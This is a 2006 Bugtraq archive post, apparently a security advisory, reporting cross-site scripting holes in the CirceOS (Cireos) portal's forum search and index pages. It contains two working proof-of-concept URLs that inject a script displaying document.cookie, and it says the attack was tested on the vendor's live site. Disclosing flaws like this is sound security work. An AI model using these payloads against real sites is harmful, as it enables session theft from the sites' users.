Home page logo
/

bugtraq logo Bugtraq mailing list archives

Cireos Portal Cross Site Scripting
From: outlaw () aria-security net
Date: 28 Apr 2006 03:53:42 -0000

#Aria-Security.net Advisory
#Discovered  by: O.u.t.l.a.w
#< www.Aria-security.net>
#Gr33t to: A.u.r.a  & R () 1D3N & Smok3r
#-----------------------------------------------------------
Software: SirceOS Operative Solutions
Link: http://www.circeos.it
Attack method: Cross Site Scripting
advisory:http://www.aria-security.net/portal/circeos.txt

Summary:
cireos is a powerfull Portal and featuring a forum


Proof of Concept:
http://www.victim.com/circeos_path/forum/buscar.php?query=<script>alert(document.cookie)</script><!--
www.site.com/path/index.php?page=<script>alert(document.cookie)</script><!--

Tested On 
http://www.circeos.it/forum/index.php

Solution
contact me: Advisory () Aria-Security net


 


  By Date           By Thread  

Current thread:
  • Cireos Portal Cross Site Scripting outlaw (Apr 28)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault